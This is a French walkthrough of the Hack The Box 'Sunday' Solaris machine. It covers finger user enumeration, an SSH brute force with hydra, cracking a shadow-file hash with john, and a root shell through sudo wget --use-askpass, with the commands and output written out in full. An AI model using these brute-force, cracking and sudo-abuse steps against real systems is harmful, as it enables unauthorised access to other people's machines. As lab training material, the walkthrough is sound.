Sunday

finger hydra wget unshadow

Nom machine : Sunday
Difficulté : Facile
OS : Solaris

Enumération

NMAP

Nmap scan report for 10.10.10.76
Host is up (0.029s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
79/tcp  open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp open  rpcbind 2-4 (RPC #100000)
515/tcp open  printer

22022 : ssh

Finger (79)

msfconsole
msf6 > use auxiliary/scanner/finger/finger_users
msf6 auxiliary(scanner/finger/finger_users) > show options

Module options (auxiliary/scanner/finger/finger_users):

   Name        Current Setting             Required  Description
   ----        ---------------             --------  -----------
   RHOSTS                                  yes       The target host(s), see https://docs.metaspl
                                                     oit.com/docs/using-metasploit/basics/using-m
                                                     etasploit.html
   RPORT       79                          yes       The target port (TCP)
   THREADS     1                           yes       The number of concurrent threads (max one pe
                                                     r host)
   USERS_FILE  /usr/share/metasploit-fram  yes       The file that contains a list of default UNI
               ework/data/wordlists/unix_            X accounts.
               users.txt


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/finger/finger_users) > set RHOSTS 10.10.10.76
RHOSTS => 10.10.10.76
msf6 auxiliary(scanner/finger/finger_users) > run

[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: ikeuser
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: netadm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: netcfg
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dhcpserv
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: daemon
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: _ntp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: ftp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: noaccess
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody4
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: root
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sshd
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sys
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: aiuser
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: openldap
[+] 10.10.10.76:79        - 10.10.10.76:79 Users found: _ntp, adm, aiuser, bin, daemon, dhcpserv, dladm, ftp, ikeuser, lp, netadm, netcfg, noaccess, nobody, nobody4, openldap, root, sshd, sys
[*] 10.10.10.76:79        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nous avons également changé la liste pour tenter d'avoir des noms plus communs mais sans succès.

Nous avons téléchargé finger-user-enum.pl et avons essayé names.txt.

finger-user-enum/finger-user-enum.pl at master · pentestmonkey/finger-user-enumGitHub

┌──(kali㉿kali)-[~/htb/sunny]
└─$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10178
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sun Nov 10 15:00:08 2024 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Sun Nov 10 15:02:44 2024 #########
16 results.

10178 queries in 156 seconds (65.2 queries / sec)

Nous avons sunny et sammy en plus.

Accès initial

Nous allons tenter de bruteforce...

┌──(kali㉿kali)-[~/htb/monde]
└─$ hydra -l sunny -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.76 -s 22022 -v

On trouve le password : sunday

┌──(kali㉿kali)-[~/htb/monde]
└─$ ssh sunny@10.10.10.76 -p 22022
sunny@sunday:~$ whoami
sunny

Le dossier backup à la racine est intéressant.

sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat *
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Nous reprenons le fichier sur notre machine pour pouvoir cracker le mot de passe de sammy

┌──(kali㉿kali)-[~/htb/sunny]
└─$ cat pass     
sammy:x:100:10::/home/sammy:/usr/bin/bash
┌──(kali㉿kali)-[~/htb/sunny]
└─$ cat shad     
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
┌──(kali㉿kali)-[~/htb/sunny]
└─$ unshadow pass shad > sammy.txt
┌──(kali㉿kali)-[~/htb/sunny]
└─$ cat sammy.txt                 
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:100:10::/home/sammy:/usr/bin/bash

┌──(kali㉿kali)-[~/htb/sunny]
└─$ john sammy.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)     
1g 0:00:00:13 DONE (2024-11-10 15:10) 0.07668g/s 15705p/s 15705c/s 15705C/s fadista..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nous pouvons maintenant nous connecter en tant que sammy et récupérer le flag.

Elévation des privilèges

sammy@sunday:/home/sammy$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

wget | GTFOBinsgtfobins.github.io

sammy@sunday:/home/sammy$ TF=$(mktemp)
sammy@sunday:/home/sammy$ chmod +x $TF
sammy@sunday:/home/sammy$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sammy@sunday:/home/sammy$ sudo wget --use-askpass=$TF 0
root@sunday:/home/sammy# whoami
root

PrécédentSolidState SuivantAD

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagFinger (79)

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

Finger (79)

Accès initial

Elévation des privilèges